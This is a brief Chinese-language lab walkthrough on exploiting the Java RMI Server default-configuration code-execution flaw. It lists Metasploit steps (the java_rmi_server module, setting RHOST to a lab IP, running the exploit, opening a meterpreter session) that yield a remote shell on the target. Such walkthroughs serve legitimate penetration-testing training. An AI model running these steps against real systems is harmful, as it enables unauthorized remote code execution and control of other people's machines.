Java RMI SERVER 命令执行漏洞
Java RMI Serve 的 RMI 注册表和 RMI 激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
1.在kali中执行msfconsole,启动metasploit
2.use exploit/multi/misc/java_rmi_server,选择漏洞
3.set RHOST 192.168.175.130 设置要攻击的机器IP
4.exploit,开始攻击
5.利用成功,得到 meterpreter shell
注意:其他参数默认,不用修改,修改后可能会弹不出来目标靶机的 meterpreter shell
6.执行 sessions -i 2,即可进入meterpreter工具